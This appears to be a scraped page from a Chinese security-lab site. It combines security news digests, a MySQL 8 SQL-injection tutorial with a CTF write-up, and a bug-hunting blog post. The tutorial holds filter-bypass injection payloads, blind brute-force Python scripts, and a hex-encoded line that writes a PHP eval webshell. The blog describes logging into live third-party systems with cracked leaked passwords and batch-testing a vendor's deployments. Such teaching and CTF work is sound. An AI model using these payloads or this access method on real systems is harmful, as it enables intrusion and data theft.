免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Chrome 96 修复多个高危漏洞 https://www.securityweek.com/chrome-96-plugs-high-risk-browser-flaws 2、英特尔 CPU 漏洞可导致加密密钥泄露 https://www.securityweek.com/intel-cpu-vulnerability-can-expose-cryptographic-keys 3、SharkBot：一种针对欧洲银行的新型安卓木马 https://securityaffairs.co/wordpress/124650/mobile-2/sharkbot-android-trojan.html 4、NPM 修复私有包名泄露和未授权问题 https://securityaffairs.co/wordpress/124671/security/github-npm-package-flaws.html 5、微软为 Defender 添加了 AI 驱动的勒索软件保护 https://www.bleepingcomputer.com/news/microsoft/microsoft-adds-ai-driven-ransomware-protection-to-defender/ 6、新的攻击手法可完全绕过DRAM内存Rowhammer漏洞现有保护措施 https://www.securityweek.com/blacksmith-rowhammer-fuzzer-bypasses-existing-protections 7、 700 万 Robinhood 客户数据被在线出售 https://www.bleepingcomputer.com/news/security/7-million-robinhood-user-email-addresses-for-sale-on-hacker-forum/ 8、MosesStaff组织针对以色列公司窃取敏感数据 https://research.checkpoint.com/2021/mosesstaff-targeting-israeli-companies/ 9、CISA发布工业控制系统警报敦促修补关键漏洞 https://www.infosecurity-magazine.com/news/cisa-patch-these-ics-flaws-across/ 10、VMware披露vCenter Server中的权限提升漏洞 https://securityaffairs.co/wordpress/124465/security/vmware-vcenter-server-flaw.html

https://www.yijinglab.com/pages/CTFLaboratory.jsp 前言 最近打比赛的时候遇到了mysql8的知识点，这里就从环境搭建开始到注入一起一步步慢慢学习。 环境搭建 我这里是用docker在服务器上拉的，然后用navicat来看的 下载 docker pull mysql:8.0.21 docker run -d --name=mysql8 -p 3306:3306 -e MYSQL_ROOT_PASSWORD=123456 mysql:8.0.21 进入mysql容器，并登陆mysql docker exec -it mysql8 bash mysql -uroot -p //然后输入密码开启远程访问权限 use mysql; select host,user from user; ALTER USER 'root'@'%' IDENTIFIED WITH mysql_native_password BY '123456'; flush privileges; 连进去看看版本号就可以了，如果是8.0.21则环境搭建完成 基本知识 本次测试所用到的user表内容如下 table 基本用法 在MYSQL8以后出现的新语法，作用和select类似。 作用：列出表中全部内容 语法：TABLE table_name [ORDER BY column_name] [LIMIT number [OFFSET number]] 支持UNION联合查询、ORDER BY排序、LIMIT子句限制产生的行数。 table user order by 2 table user limit 2与SELECT的区别： 1.TABLE始终显示表的所有列 2.TABLE不允许对行进行任意过滤，即TABLE 不支持任何WHERE子句 注意事项 比较问题1 (table information_schema.TABLESPACES_EXTENSIONS limit 6,7) 结果 TABLESOACE_NAME tmp/user这里用小于号进行比较 select (('u','')<(table information_schema.TABLESPACES_EXTENSIONS limit 6,7)) 返回值：0select (('s','')<(table information_schema.TABLESPACES_EXTENSIONS limit 6,7)) 返回值：1select (('t','')<(table information_schema.TABLESPACES_EXTENSIONS limit 6,7)) 返回值：1综上可以看出来如果是u的,其ascii 编码大于t 的，得到的是1。 但是如果是s的话小于得到1，但是如果是t的话是等于，但是这里的返回值则为1。 所以在进行注入中注意要把得到的数ascii值减1。 比较问题2 来看下面的两个例子 select (('tmp/use','')<(table information_schema.TABLESPACES_EXTENSIONS limit 6,7)) 返回值：1select (('tmp/user','')<(table information_schema.TABLESPACES_EXTENSIONS limit 6,7)) 返回值：NULLselect (('tmp/uses','')<(table information_schema.TABLESPACES_EXTENSIONS limit 6,7)) 返回值：0所以这里在判断最后一位是，要注意这里记得到取0之前的值。 整数比较问题 table user limit 0,1 返回值：1 hel看下面的例子 select (('0',2)<(table user limit 0,1)) 返回值：1select (('1',2)<(table user limit 0,1)) 返回值：0select (('2',2)<(table user limit 0,1)) 返回值：0select (('0aaaa',2)<(table user limit 0,1)) 返回值：1select (('1aaaa',2)<(table user limit 0,1)) 返回值：0在这里，由于id是整型，当我们输入的是字符型时，在进行比较过程中，字符型会被强制转换为整型，而不是像之前一样读到了第一位以后没有第二位就会停止，也就是都会强制转换为整型进行比较并且会一直持续下去，所以以后写脚本当跑到最后一位的时候尤其需要注意。 VALUES VALUES 类似于其他数据库的 ROW 语句，造数据时非常有用。 作用：列出一行的值 语法：VALUES row_constructor_list[ORDER BY column_designator][LIMIT BY number] row_constructor_list:   ROW(value_list)[, ROW(value_list)][, ...]value_list:   value[, value][, ...]column_designator:   column_index他的语法看起来很长，但用起来很简洁。 基本使用 VALUES ROW(1,2) VALUES ROW(1,2,3) VALUES ROW(1,2,3),ROW(5,6,7)配合union使用 VALUES ROW(1, 2) union select * from user select * from user union VALUES ROW(1, 2) information_schema.TABLESPACES_EXTENSIONS 我们可以通过这个表去查询所有数据库中的数据库和数据表 table information_schema.TABLESPACES_EXTENSIONS 等价于 select * from information_schema.TABLESPACES_EXTENSIONS 在这里我也列出几个和他相同功能的函数 information_schema.SCHEMA information_schema.TABLES information.COLUMNS mysql.innodb_table_stats mysql.innodb_index_stats sys.schema_tables_with_full_table_scans 实战演练 基础练习 index.php <?php // error_reporting(0); require_once('config.php'); highlight_file(__FILE__); $id = isset($_POST['id'])? $_POST['id'] : 1; if (preg_match("/(select|and|or| )/i",$id) == 1){    die("MySQL version: ".$conn->server_info); } $data = $conn->query("SELECT username from users where id = $id"); foreach ($data as $users){    var_dump($users['username']); } ?>config.php <?php // config.php $dbhost = 'ip';       // mysql服务器主机地址 $dbuser = 'root';           // mysql用户名 $dbpass = '123456';          // mysql用户名密码 $dbname = 'user';         // mysql数据库 $conn = mysqli_connect($dbhost,$dbuser,$dbpass,$dbname); ?>数据库信息 输入id会返回数据库的值 这里过滤了几个字符，尝试绕过并报出数据库 id=0%09union%09values%09row(database())爆字段 如果字段数多了或者少了会报错 得到字段数 id=0%09||('1','')<(table%09users%09limit%091) //有回显 id=0%09||('2','')<(table%09users%09limit%091) //无回显然后去爆破值 select ('1','a')<(table users limit 1) //有回显 select ('1','r')<(table users limit 1) //有回显 id=0%09||('1','s')<(table%09users%09limit%091) //这里就可以得到第一个值，然后继续爆 id=0%09||('1','roos')<(table%09users%09limit%091) //有回显 id=0%09||('1','root')<(table%09users%09limit%091) //无回显到这里记得在最后一个值加上1，这样就可以得到数据库的值 脚本 import requests def ord2hex(string): result = "" for i in string:  r = hex(ord(i));  r = r.replace('0x','')  result = result+r return '0x'+result tables = 'roabcdefghijklmnpqstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ' flag = "" for i in range(0,50): for j in range(110,122): data = { 'id':"0/**/||('1','%s')<(table/**/users/**/limit/**/1)"%(flag+chr(j)), } r = requests.post('http://127.0.0.1/index.php',data=data); print(data) if 'string(4)' in r.text: continue else: flag = flag +chr(j-1) print(flag) break if(len(flag)<i): break print(flag[:-1]+chr(ord(flag[-1:])+1)) 写文件 除了上面的方法还可以通过读写来getshell 查看是否有权限写入文件 id=0/**/union/**/values/**/row(user()) id=0/**/union/**/values/**/row(@@secure_file_priv)如果有，则可以通过下面的语句写入 id=0/**/union/**/values/**/row(load_file('/flag'))id=0/**/union/**/values/**/row(0x3c3f706870 406576616c28245f504f53545b315d293b3f3e) /**/into/**/outfile/**/'/var/www/html/shell.php' //<?php @eval($_POST[1]);?> 香山杯---login 这个题目没环境，这里就凭借自己的记忆力简单写一下解题过程。 描述 题目内容：只是一个简单的登录框，登录就有flag。 hint: mysql8新特性:values的利用 解题过程 进去就一个登陆框，直接抓包看看 发现这里对于不同的sql注入字符的弹窗是不同反应，如果被过滤了会弹出呵呵 简单爆破一下，发现select被过滤了，这里想到了mysql8.0.2版本的table绕过。 这里还可以用||来进行拼接。 测试，发现这样就可以进行注入。 username=123' || 1=1#&password=456&login=login脚本 import requests flag='' i=0 while True: small=32 big=127 i=i+1 while small<big: mid=small+big>>1 data={ 'username':f"1' || ascii(mid(database(),{i},1))>{mid}#", 'password':'1', } r=requests.post('http://xxx.com/',data=data) if '密码错误' in r.text: small=mid+1 else: big=mid if(i>4): break else: print(chr(small)) flag+=chr(small) print(flag)通过上面的脚本可以知道数据库的名称，然后通过table去爆破表。 import requests def ord2hex(string): result = "" for i in string:  r = hex(ord(i));  r = r.replace('0x','')  result = result+r return '0x'+result tables = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz' flag = "" for i in range(0,50): for j in range(48,122):  data = {  # 'username':"a0'||(('1','admin','%s')<(table ctfusers limit 0,1))#"%(flag+chr(j)),  #'username':"a0'||(('ctf','%s',3,4,5,6,7,8)<=(table mysql.innodb_index_stats limit 2,1))#"%(flag+chr(j)),  # username=aadmin' union values row(1,'admin','21232f297a57a5a743894a0e4a801fc3')#&password=admin&login=login   'password':'', }  r = requests.post('http://eci-2zefs2aa42oei8t7ms26.cloudeci1.ichunqiu.com',data=data);  if '用户名不存在' in r.text:   flag = flag +chr(j-1)   print(flag)   break上面脚本可以爆破出数据库的值，但是这里的密码是md5加密的，不能直接解密。 本题就用union去生成了一个新的values来进行绕过。 username=aadmin' union values row(1,'admin','21232f297a57a5a743894a0e4a801fc3')#&password=admin&login=login登录进去就有flag了。 搭建环境问题 如果在搭建本地环境中出现了Call to a member function query() on boolean的问题的话，修改/etc/mysql/my.cnf文件。（注意一下，这里可能文件的路径会不一样，只要找my.cnf就可以） 就添加这两行 bind-address = 0.0.0.0 default_authentication_plugin=mysql_native_password完整的代码 # Copyright (c) 2017, Oracle and/or its affiliates. All rights reserved. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; version 2 of the License. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA # # The MySQL Server configuration file. # # For explanations see # http://dev.mysql.com/doc/mysql/en/server-system-variables.html [mysqld] pid-file       = /var/run/mysqld/mysqld.pid socket         = /var/run/mysqld/mysqld.sock datadir         = /var/lib/mysql secure-file-priv= NULL bind-address = 0.0.0.0 default_authentication_plugin=mysql_native_password # Custom config should go here 参考文章 https://www.actionsky.com/2777.htmlhttps://blog.csdn.net/HBohan/article/details/119757059

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、在被国际行动摧毁十个月后，Emotet 僵尸网络重新活跃 https://securityaffairs.co/wordpress/124642/cyber-crime/operation-reacharound-emotet-return.html 2、Cloudflare 宣布缓解迄今为止最大的2Tbps DDoS攻击 https://securityaffairs.co/wordpress/124634/security/cloudflare-mitigated-ddos-2-tbps.html 3、微软紧急更新以修复 Windows Server 身份验证失败问题 https://securityaffairs.co/wordpress/124625/security/microsoft-windows-server-auth-failures.html 4、Diebold Nixdorf ATM 漏洞允许攻击者修改固件窃取现金 https://www.securityweek.com/diebold-nixdorf-atm-flaws-allowed-attackers-modify-firmware-steal-cash 5、Nasa、西门子和大众使用的物联网DDS协议漏洞可能被黑客利用 https://www.securityweek.com/iot-protocol-used-nasa-siemens-and-volkswagen-can-be-exploited-hackers 6、研究人员展示了新的 Tor 加密流量指纹攻击技术 https://thehackernews.com/2021/11/researchers-demonstrate-new.html 7、网络犯罪分子针对阿里云ECS实例进行挖矿和植入恶意软件 https://threatpost.com/cybercriminals-alibaba-cloud-cryptomining-malware/176348/ 8、Magniber 勒索软件利用IE漏洞 https://cyware.com/news/magniber-is-now-exploiting-internet-explorer-flaws-48b860e6 9、酒店预订网站 RedDoorz 数百万新加坡和东南亚客户数据泄露 https://www.straitstimes.com/tech/tech-news/59m-customers-of-reddoorz-hotel-booking-site-leaked-in-spores-largest-data-breach 10、研究人员发现针对哈萨克斯坦的多阶段攻击 https://blog.malwarebytes.com/threat-intelligence/2021/11/a-multi-stage-powershell-based-attack-targets-kazakhstan/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、英特尔、AMD 修补多个高危安全漏洞 https://www.securityweek.com/intel-amd-patch-high-severity-security-flaws 2、"BotenaGo"利用33个漏洞攻击数百万路由器和物联网设备 https://www.securityweek.com/botenago-malware-targets-routers-iot-devices-over-30-exploits 3、Zoom 修补多个软件组件高危漏洞 https://www.securityweek.com/zoom-patches-high-risk-flaws-meeting-connector-keybase-client 4、谷歌、Adobe 发布新的开源安全工具 https://www.securityweek.com/google-adobe-announce-new-open-source-security-tools 5、 FBI 电子邮件服务器遭入侵被用来发送虚假警告钓鱼邮件 https://securityaffairs.co/wordpress/124570/cyber-crime/fbi-hacked-email-server.html 6、零售巨头 Costco 披露数据泄露，支付卡数据泄露 https://securityaffairs.co/wordpress/124534/data-breach/costco-data-breach.html 7、新的 Abcbot DDoS 僵尸网络以 Linux 系统为目标 https://securityaffairs.co/wordpress/124542/security/abcbot-ddos-botnet-linux.html 8、越来越多的钓鱼活动利用HTML走私技术 https://thehackernews.com/2021/11/hackers-increasingly-using-html.html 9、攻击者可利用GoCD中的漏洞发起供应链攻击 https://portswigger.net/daily-swig/gocd-bug-chain-provides-second-springboard-for-supply-chain-attacks 10、TrickBot团伙通过钓鱼邮件部署BazarLoader https://www.bleepingcomputer.com/news/security/windows-10-app-installer-abused-in-bazarloader-malware-attacks/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、一项 18 个月的研究发现了近 100 个 TCP/IP 堆栈漏洞 https://www.securityweek.com/nearly-100-tcpip-stack-vulnerabilities-found-during-18-month-research-project 2、PS5 根密钥被窃取和内核漏洞被利用 https://threatpost.com/playstation-5-hacks-same-day/176240/ 3、新僵尸网络-Abcbot 正在形成 https://cyware.com/news/abcbot-a-new-botnet-in-the-making-f79494e1 4、HPE 称黑客使用窃取的密钥入侵了 Aruba Central https://www.bleepingcomputer.com/news/security/hpe-says-hackers-breached-aruba-central-using-stolen-access-key/ 5、TeamTNT 使用新的复杂技术入侵Docker 服务器 https://cyware.com/news/teamtnt-uses-new-sophisticated-techniques-against-docker-systems-5d295e64 6、Lazarus Group 利用植入后门的IDA Pro攻击安全研究人员 https://www.bleepingcomputer.com/news/security/lazarus-hackers-target-researchers-with-trojanized-ida-pro/ 7、VoIP 提供商 Telnyx 遭DDoS攻击 https://cisomag.eccouncil.org/ddos-attack-on-voip-provider-telnyx-impacts-global-telephony-services 8、Apache Storm修复了两个预认证RCE漏洞 https://portswigger.net/daily-swig/apache-storm-maintainers-patch-two-pre-auth-rce-vulnerabilities 9、Palo Alto Networks修复产品中的零日漏洞 https://www.randori.com/blog/cve-2021-3064/ 10、Citrix发布安全更新修复ADC中的关键漏洞 https://securityaffairs.co/wordpress/124452/security/citrix-dos-adc-gateway.html

https://www.yijinglab.com/expc.do?ec=ECID07d9-3ccd-4c90-8a09-b980d8cd7858前言   个人在无事的时候喜欢逛cnvd官网，查看最近出的一些漏洞，以及去尝试挖掘，在此过程中让自己的能力提升，运气好的情况下说不定还能获取证书（小小的想法，嘿嘿）。 寻找目标？   又和往常一样，继续逛cnvd官网。 这里提示说一下，这边我主要选择一个是web应用漏洞列表，因为比较好挖，而且适合我这样的小白。 确定目标   在艰难的选择下，选中一名幸运厂商“xxxx”，下面直接说挖掘方法。注：在寻找厂家的时候一定要选择那些获得证书的漏洞厂家，这样只要能发现厂家的一些漏洞，那证书岂不是稳稳的嘛。具体获得证书的要求如下： 知道了获取方式的要求，就直接进入主题吧。 利用搜索工具或者引擎，搜索厂家的系统或者设备 搜索方式个人比较喜欢用fofa，fofa-yyds（要是有个高级会员就更好了） 如何去搜？简单的一种方式，就是直接将某设备或者某系统直接复制粘贴到fofa搜索框中，如下： 可能上面有点啰嗦了，但是了解怎么去搜索才是挖到漏洞和获取证书的前提。 第一本证书 下面说说个人挖掘到证书的流程。1、确定网站指纹，去目标网站官网，了解该系统或者设备使用什么语言什么框架所写。 如：我所发现这次的目标是使用了spring boot框架所写，所以直接确定是否存在信息泄露等漏洞。 发现是spring boot，下面直接进行工具扫描。注：一些网站并未显示出来，也可能显示出来但是漏洞被修复了，所以需要去多个网站查看，这个漏洞我是进行多个站点扫描才发现。 利用工具：xray、dirsearch等目录工具基本都可以，这里我直接用xray进行被动式扫描。 漏洞如下：http://xxx:port/env 因敏感信息比较多，所以就稍微截了点图。 发现第一个漏洞（信息泄露） 这个漏洞可以直接获取存在用户的密码（md5加密） 然而登录页面中发现登录密码，加密方式并不是md5加密，是其他加密。（当时有点迷）。在尝试了多个网站，发现有一些md5是可以被解出来的。通过解出来的密码可以成功登陆。 成功登陆 到这里第一本证书到手。前提是别人未提交，那必须稳稳拿下。 第二本证书 第二个漏洞-未授权访问 这个漏洞还是继续去分析上面的env页面，从中发现了这个漏洞（未授权访问）。 从中发现了一个目录/xxxmms/，当多次尝试一些网站的时候发现成功跳转了，所以第二个证书到手了----未授权访问。 未获得证书（撞洞了） 再回头去看env页面，发现还有其他的一些目录，还是一样操作，多个网站进行测试，发现了其他的一个系统。 这里的密码加密方式为md5，并且我发现其他用户system用户，这个才是管理员用户。 然后直接替换md5进行登录，在这里需要使用burp提换两次密码，才能成功登录。 首先通过信息泄露漏洞，获取system的MD5值： 通过提换md5进行登录（还有一次替换跳过） 成功登录 第三本证书 通过env页面泄露的目录，又发现其他系统 在页面中发现使用手册，发现默认密码为123456，但是未登录成功。相继去尝试了很多站点，发现都被修改了密码。然后就利用一开始解密出来的密码进行登录，发现有的可以登录成功，有的却不行。最终还是找到了远超过10+的案例。并去提交了漏洞，但未成功通过。驳回如下： 然后没办法继续去在后台进行测试，寻找未授权的页面，这样才能获取证书。最终通过burp和目录扫描工具发现一个soap接口信息泄露，并且未带有token值，所以应该存在未授权。访问其他未登录的站点： 到此结束这次的测试。提交如下： 先到手两本证书，还有一本还在制定中。 ### 这里其实没有多少技术含量，主要就是运气加细心，挖掘过程其实大部分都是差不多的，首先了解网站使用的指纹，然后使用的框架是不是有一些暴露出来的漏洞，过后就是批量去做，不要盯着一个站点去看，因为可能这个站点就没漏洞或者一些信息泄露的页面，通过多个站点进行测试，说不定就发现了新大陆了呢。所以多做试探就好，多结合一些工具进行测试。总会有的系统存在差异，只要抓到一个，像这种的厂家就可以进行批量打，还是比较舒服的。

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、Palo Alto GlobalProtect VPN 中存在远程代码执行漏洞 https://www.securityweek.com/remote-code-execution-flaw-palo-alto-globalprotect-vpn 2、VMware 正在开发针对高危 vCenter Server 漏洞的补丁 https://www.securityweek.com/vmware-working-patches-serious-vcenter-server-vulnerability 3、Citrix 修补了 ADC网关中的严重漏洞 https://www.securityweek.com/citrix-patches-critical-vulnerability-adc-gateway 4、WP Reset PRO 插件存在严重漏洞可删除数据库 https://www.securityweek.com/critical-flaw-wordpress-plugin-leads-database-wipe 5、被称为"勒索软件终结者"的RPC 防火墙发布开源版本 https://www.securityweek.com/rpc-firewall-dubbed-ransomware-kill-switch-released-open-source 6、恶意软件"PhoneSpy"针对韩国Android手机用户 https://www.securityweek.com/south-korean-users-targeted-android-spyware-phonespy 7、BusyBox 被发现了 14 个新漏洞，影响数百万设备 https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/ 8、研究人员发现Lyceum组织针对中东电信提供商 https://www.accenture.com/us-en/blogs/cyber-defense/iran-based-lyceum-campaigns 9、德国医疗软件巨头Medatixx遭到勒索软件攻击 https://www.bleepingcomputer.com/news/security/medical-software-firm-urges-password-resets-after-ransomware-attack/ 10、TrickBot Gang 与 TA551 Group 合作提供 Conti 勒索软件 https://securityboulevard.com/2021/11/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、微软周二补丁日修复了55个漏洞 https://www.securityweek.com/zero-days-under-attack-microsoft-plugs-exchange-server-excel-holes 2、与俄有关联的"Evil Corp"组织利用Serv-U 漏洞 https://www.securityweek.com/russian-cybercrime-group-exploits-solarwinds-serv-u-vulnerability 3、Adobe 修复了 RoboHelp 服务器高危漏洞 https://www.securityweek.com/adobe-patches-critical-robohelp-server-security-flaw 4、西门子和施耐德电气修复了ICS产品中的50多个漏洞 https://www.securityweek.com/ics-patch-tuesday-siemens-and-schneider-electric-address-over-50-vulnerabilities-0 5、多种医疗、OT系统受NUCLEUS:13漏洞影响 https://www.securityweek.com/many-healthcare-ot-systems-exposed-attacks-nucleus13-vulnerabilities 6、多个REvil 勒索软件关联公司被警察捣毁 https://securityaffairs.co/wordpress/124372/cyber-crime/revil-ransomware-arrests-romania-and-kuwait.html 7、TeamTNT 通过暴露的Docker API部署挖矿程序 https://www.trendmicro.com/en_us/research/21/k/compromised-docker-hub-accounts-abused-for-cryptomining-linked-t.html 8、 黑客入侵Instagram账户传播比特币骗局 https://www.vice.com/en/article/93bw9z/bitcoin-scam-hostage-videos-instagram 9、CVL公司暴露超过4000万印度投资者数据 https://ciso.economictimes.indiatimes.com/news/data-breach-at-cdsls-kyc-arm-exposed-4-39-cr-investors-data-twice-within-10-days-cyberx9/87577170 10、电子零售巨头MediaMarkt遭勒索软件攻击 https://securityaffairs.co/wordpress/124338/cyber-crime/mediamarkt-ransomware-attack.html

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、股票交易平台 Robinhood 被黑，数百万用户信息泄露 https://www.securityweek.com/robinhood-hacked-millions-names-emails-stolen 2、ADSelfService Plus 0day漏洞影响多家跨国公司 https://www.securityweek.com/global-companies-compromised-adselfservice-plus-exploitation 3、欧洲刑警宣布逮捕与 REvil、GandCrab 勒索软件有关的 7 人 https://www.securityweek.com/europol-announces-arrests-7-people-linked-revil-gandcrab-ransomware 4、飞利浦 TASY EMR 中存在高危SQL注入漏洞 https://thehackernews.com/2021/11/critical-flaws-in-philips-tasy-emr.html 5、新Magecart组使用浏览器脚本逃避虚拟机检测 https://securityaffairs.co/wordpress/124287/hacking/magecart-e-skimmer-avoids-vms.html 6、希腊多家航运公司遭到勒索软件攻击 https://www.maritime-executive.com/article/cyberattack-hits-multiple-greek-shipping-firms 7、Mozilla发布Thunderbird 91.3版本修复数十个漏洞 https://www.bleepingcomputer.com/news/security/mozilla-thunderbird-913-released-to-fix-high-impact-flaws/ 8、Google推出新功能，用户可通过密码保护搜索历史记录 https://www.cnbeta.com/articles/tech/1199195.htm 9、GitLab 服务器被利用发动 DDoS 攻击 https://therecord.media/gitlab-servers-are-being-exploited-in-ddos-attacks-in-excess-of-1-tbps/ 10、报告称，77%的rootkit被网络犯罪分子当作间谍工具使用 https://www.helpnetsecurity.com/2021/11/05/rootkits-espionage/

免责声明：以下内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以下内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。 1、研究人员发现Babuk 勒索软件利用 ProxyShell 漏洞 https://www.securityweek.com/babuk-ransomware-seen-exploiting-proxyshell-vulnerabilities 2、研究人员发布针对 BrakTooth 蓝牙漏洞的 PoC https://www.securityweek.com/researchers-release-poc-tool-targeting-braktooth-bluetooth-vulnerabilities 3、匈牙利官员证实政府购买、使用过Pegasus 间谍软件 https://www.securityweek.com/hungarian-official-government-bought-used-pegasus-spyware 4、美国悬赏 1000 万美元追捕 DarkSide 勒索软件团伙 https://www.securityweek.com/us-gov-offering-10m-reward-data-darkside-ransomware-operators 5、网络犯罪分子冒充网络安全公司 Proofpoint进行钓鱼活动 https://securityaffairs.co/wordpress/124298/cyber-crime/phishing-campaign-proofpoint.html 6、美国国防承包商EWA披露数据泄露 https://securityaffairs.co/wordpress/124236/data-breach/electronic-warfare-associates-data-breach.html 7、研究人员发现流行的“coa”NPM库被劫持 https://www.bleepingcomputer.com/news/security/popular-coa-npm-library-hijacked-to-steal-user-passwords/ 8、思科修复了硬编码凭据和默认SSH密钥的问题 https://securityaffairs.co/wordpress/124198/security/cisco-hard-coded-credentials.html 9、乌克兰确认俄罗斯FSB中五人为黑客组织成员 https://thehackernews.com/2021/11/ukraine-identifies-russian-fsb-officers.html 10、法国CERT发布针对Lockean组织的分析报告 https://www.bleepingcomputer.com/news/security/lockean-multi-ransomware-affiliates-linked-to-attacks-on-french-orgs/